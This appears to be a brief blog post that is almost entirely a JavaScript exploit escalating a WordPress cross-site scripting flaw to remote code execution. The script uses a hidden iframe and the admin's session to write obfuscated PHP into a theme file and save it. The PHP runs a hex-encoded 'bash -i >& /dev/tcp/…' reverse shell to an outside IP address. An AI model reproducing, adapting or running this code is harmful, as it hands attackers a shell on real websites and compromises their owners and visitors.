/XSS to RCE escalation

Created Sun, 19 Feb 2023 18:34:51 +0100
129 Words

WordPress XSS to RCE escalation

// wp-xss2rce.js
// Turning any WordPress XSS into a reverse shell
// © Jean Pereira <counterswarm.de>

const exploitPayload = [
  0x62, 0x61, 0x73, 0x68, 0x20, 0x2D, 0x69, 0x20, 0x3E,
  0x26, 0x20, 0x2F, 0x64, 0x65, 0x76, 0x2F, 0x74, 0x63,
  0x70, 0x2F, 0x36, 0x38, 0x2E, 0x31, 0x38, 0x33, 0x2E,
  0x37, 0x35, 0x2E, 0x30, 0x2F, 0x39, 0x39, 0x39, 0x39,
  0x20, 0x30, 0x3E, 0x26, 0x31
]

const payloadStart = 0x00
const reservedBytes = 0x05

let localFrame = document.createElement(`iframe`)
let adminURL = document.querySelector(`a[href*="site-editor"]`).href.split(`site-editor.php`)[0]

localFrame.src = `${adminURL}/theme-editor.php?file=patterns%2Ffooter-default.php`
localFrame.style.display = `none`

localFrame.onload = () => {
  let documentHook = localFrame.contentDocument.querySelector(`.CodeMirror`).CodeMirror.getDoc()
  let exploitVector = exploitPayload.map(e => e.toString(16)).join(``)

  documentHook.replaceRange(
    (
      `\u000d\u000a\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0022\u0065\u0063` +
      `\u0068\u006f\u0020\u1337\u007c\u0078\u0078\u0064\u0020\u002d\u0072\u0020` +
      `\u002d\u0070\u007c\u0024\u0028\u0065\u0063\u0068\u006f\u0020\u0036\u0032` +
      `\u0036\u0031\u0037\u0033\u0036\u0038\u007c\u0078\u0078\u0064\u0020\u002d` +
      `\u0072\u0020\u002d\u0070\u0029\u0022\u0029\u000d\u000a
      `
    ).replace(`\u1337`, exploitVector),
    {
      line: payloadStart,
      ch: reservedBytes
    }
  )

  localFrame.contentDocument.querySelector(`.submit input[type="submit"]`).click()
}

document.body.appendChild(localFrame)